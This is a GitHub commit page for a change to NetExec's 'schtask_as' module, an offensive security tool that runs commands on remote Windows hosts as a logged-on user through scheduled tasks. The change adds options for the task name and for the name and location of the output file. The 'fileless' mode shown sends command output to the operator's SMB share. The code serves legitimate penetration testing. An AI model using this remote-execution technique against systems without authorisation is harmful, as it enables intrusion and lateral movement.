Skip to content

Commit 7657f96

Browse files
NeffIsBackNeffIsBack
authored
Merge pull request Pennyw0rth#342 from Kahvi-0/main
schtask_as Improvement - Options for custom task, file, and location.
2 parents 9cc44f6 + 0175be7 commit 7657f96

1 file changed

Lines changed: 27 additions & 7 deletions

File tree

nxc/modules/schtask_as.py

Lines changed: 27 additions & 7 deletions
Original file line numberDiff line numberDiff line change
@@ -15,17 +15,29 @@ class NXCModule:
1515
"""
1616

1717
def options(self, context, module_options):
18-
"""
18+
r"""
1919
CMD Command to execute
2020
USER User to execute command as
21+
TASK OPTIONAL: Set a name for the scheduled task name
22+
FILE OPTIONAL: Set a name for the command output file
23+
LOCATION OPTIONAL: Set a location for the command output file (e.g. '\tmp\')
2124
"""
22-
self.cmd = self.user = self.time = None
25+
self.cmd = self.user = self.task = self.file = self.location = self.time = None
2326
if "CMD" in module_options:
2427
self.cmd = module_options["CMD"]
2528

2629
if "USER" in module_options:
2730
self.user = module_options["USER"]
2831

32+
if "TASK" in module_options:
33+
self.task = module_options["TASK"]
34+
35+
if "FILE" in module_options:
36+
self.file = module_options["FILE"]
37+
38+
if "LOCATION" in module_options:
39+
self.location = module_options["LOCATION"]
40+
2941
name = "schtask_as"
3042
description = "Remotely execute a scheduled task as a logged on user"
3143
supported_protocols = ["smb"]
@@ -51,6 +63,9 @@ def on_admin_login(self, context, connection):
5163
connection.domain,
5264
self.user,
5365
self.cmd,
66+
self.file,
67+
self.task,
68+
self.location,
5469
connection.kerberos,
5570
connection.aesKey,
5671
connection.host,
@@ -79,7 +94,7 @@ def on_admin_login(self, context, connection):
7994

8095

8196
class TSCH_EXEC:
82-
def __init__(self, target, share_name, username, password, domain, user, cmd, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
97+
def __init__(self, target, share_name, username, password, domain, user, cmd, file, task, location, doKerberos=False, aesKey=None, remoteHost=None, kdcHost=None, hashes=None, logger=None, tries=None, share=None):
8398
self.__target = target
8499
self.__username = username
85100
self.__password = password
@@ -99,6 +114,9 @@ def __init__(self, target, share_name, username, password, domain, user, cmd, do
99114
self.logger = logger
100115
self.cmd = cmd
101116
self.user = user
117+
self.file = file
118+
self.task = task
119+
self.location = location
102120

103121
if hashes is not None:
104122
if hashes.find(":") != -1:
@@ -181,7 +199,11 @@ def gen_xml(self, command, fileless=False):
181199
<Command>cmd.exe</Command>
182200
"""
183201
if self.__retOutput:
184-
self.__output_filename = f"\\Windows\\Temp\\{gen_random_string(6)}"
202+
fileLocation = "\\Windows\\Temp\\" if self.location is None else self.location
203+
if self.file is None:
204+
self.__output_filename = os.path.join(fileLocation, gen_random_string(6))
205+
else:
206+
self.__output_filename = os.path.join(fileLocation, self.file)
185207
if fileless:
186208
local_ip = self.__rpctransport.get_socket().getsockname()[0]
187209
argument_xml = f" <Arguments>/C {command} &gt; \\\\{local_ip}\\{self.__share_name}\\{self.__output_filename} 2&gt;&amp;1</Arguments>"
@@ -207,9 +229,7 @@ def execute_handler(self, command, fileless=False):
207229

208230
dce.set_credentials(*self.__rpctransport.get_credentials())
209231
dce.connect()
210-
211-
tmpName = gen_random_string(8)
212-
232+
tmpName = gen_random_string(8) if self.task is None else self.task
213233
xml = self.gen_xml(command, fileless)
214234

215235
self.logger.info(f"Task XML: {xml}")

0 commit comments

Comments
 (0)